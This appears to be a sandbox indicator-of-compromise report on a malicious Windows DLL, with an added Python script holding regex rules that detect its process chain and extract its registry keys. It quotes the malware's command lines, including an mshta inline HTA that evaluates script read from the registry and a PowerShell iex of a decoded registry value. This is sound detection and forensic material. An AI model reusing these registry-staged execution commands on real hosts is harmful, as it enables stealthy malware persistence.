IOC Report

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| uT9rwkGATJ.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | initial sample | malicious |
| C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | malicious |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP | MSVC .res | dropped | clean |
| C:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP | MSVC .res | dropped | clean |
| C:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP | MSVC .res | dropped | clean |
| C:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP | MSVC .res | dropped | clean |
| C:\Users\user\AppData\Local\Temp\RES9EC1.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\RESB12F.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\RESB287.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\RESC95B.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2althh.jtq.psm1 | very short file (no magic) | dropped | clean |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fsqk4c.qy5.psm1 | very short file (no magic) | dropped | clean |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5szhzhvw.zcn.ps1 | very short file (no magic) | dropped | clean |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1 | very short file (no magic) | dropped | clean |
| C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean |
| C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean |
| C:\Users\user\AppData\Local\Temp\ebytp2em.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean |
| C:\Users\user\AppData\Local\Temp\ebytp2em.out | ASCII text, with CRLF, CR line terminators | modified | clean |
| C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hiiw3gsl.out | ASCII text, with CRLF, CR line terminators | modified | clean |
| C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hjljqxud.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean |
| C:\Users\user\AppData\Local\Temp\hjljqxud.out | ASCII text, with CRLF, CR line terminators | modified | clean |
| C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean |
| C:\Users\user\AppData\Local\Temp\uio4qdnj.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean |
| C:\Users\user\AppData\Local\Temp\uio4qdnj.out | ASCII text, with CRLF, CR line terminators | modified | clean |
| C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xU5QnXMG.20211008064622.txt | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean |
| C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xd8ptVim.20211008064618.txt | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean |

23 further files from the full report are not included in this listing.

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\loaddll32.exe | loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' | malicious |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 | malicious |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny | malicious |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 | malicious |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget | malicious |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance | malicious |
| C:\Windows\System32\mshta.exe | 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) | malicious |
| C:\Windows\System32\mshta.exe | 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) | malicious |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' | malicious |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' | malicious |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' | malicious |
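The process list above shows the chain worth detecting: the DLL is loaded through rundll32 from the user's Desktop, mshta then evaluates JScript read out of the registry value HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E\MarkChart, powershell runs Invoke-Expression on the ASCII-decoded UtilDiagram value of the same key, and csc.exe compiles response files out of %TEMP% (the artefact pattern Add-Type leaves behind, matching the .cmdline/.0.cs/.dll/.out sets in the Files table). The following Python script is an added triage example and is not part of the sandbox report or its tooling. It runs a few command-line heuristics over the command lines copied from this report plus one constructed benign control, and extracts the registry key and value names so they can be exported from a live host. The rule names and regular expressions are the editor's own assumptions, not sandbox signatures.

```python
"""Added triage example for the process chain in this report.

Not part of the sandbox report. The command lines are copied from the
Processes section above; the last one is a constructed benign control.
Rule names and regexes are the editor's own heuristics.
"""
import re

SAMPLE_CMDLINES = [
    r"loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'",
    r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1",
    r"rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny",
    r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'",
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))",
    r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'",
    # constructed benign control: rundll32 loading a DLL from System32
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
]

RULES = {
    # rundll32/loaddll32 loading a DLL out of a user-writable directory
    "rundll32_dll_from_user_dir": re.compile(
        r"(?:rundll32|loaddll32)\.exe.*\\Users\\[^\\]+\\(?:Desktop|Downloads|Documents|AppData)\\[^,' ]*\.dll",
        re.I),
    # mshta running an inline HTA whose script body is read from the registry
    "mshta_inline_hta_regread": re.compile(
        r"mshta\.exe.*about:<hta:application>.*\bregread\(", re.I),
    # powershell feeding a registry value straight into Invoke-Expression
    "powershell_iex_from_registry": re.compile(
        r"powershell\.exe.*\b(?:iex|invoke-expression)\b.*\b(?:gp|get-itemproperty)\b\s+'?HK",
        re.I),
    # csc.exe compiling a response file out of %TEMP% (Add-Type style in-memory compile)
    "csc_compile_from_temp": re.compile(
        r"csc\.exe.*@'?[^']*\\Temp\\[^']*\.cmdline", re.I),
}


def match_rules(cmdline: str) -> list[str]:
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def _normalize_key(path: str) -> str:
    """Map 'HKCU:Software\\X' and the JScript-escaped 'HKCU\\\\Software\\\\X'
    to the single canonical form 'HKCU\\Software\\X'."""
    path = re.sub(r"^(HK[A-Z_]+):\\?", r"\1\\", path, flags=re.I)
    return re.sub(r"\\+", r"\\", path)


def extract_registry_refs(cmdline: str) -> list[tuple[str, str]]:
    """Pull (key, value_name) pairs out of the two read-from-registry forms
    in this report: JScript regread('key\\value') and PowerShell (gp 'key').Value."""
    refs = []
    for m in re.finditer(r"regread\(\s*'([^']+)'\s*\)", cmdline, re.I):
        key, _, value = _normalize_key(m.group(1)).rpartition("\\")
        refs.append((key, value))
    for m in re.finditer(r"\b(?:gp|get-itemproperty)\s+'([^']+)'\s*\)\s*\.(\w+)", cmdline, re.I):
        refs.append((_normalize_key(m.group(1)), m.group(2)))
    return refs


def triage(cmdlines=SAMPLE_CMDLINES) -> dict:
    """Run every rule over every command line and collect the registry IOCs."""
    hits = {}
    refs = set()
    for c in cmdlines:
        names = match_rules(c)
        if names:
            hits[c] = names
        refs.update(extract_registry_refs(c))
    return {"hits": hits, "registry_refs": sorted(refs)}


if __name__ == "__main__":
    result = triage()
    for c, names in result["hits"].items():
        print(", ".join(names), "<-", c[:80])
    for key, value in result["registry_refs"]:
        print("registry IOC:", key, "->", value)
```

Run it as a script to see which rule fires on each line; the benign control fires none. On a live host the registry_refs output is what to export before remediation, since the DLL on disk is only the loader and the mshta and powershell stages are stored entirely in those two registry values.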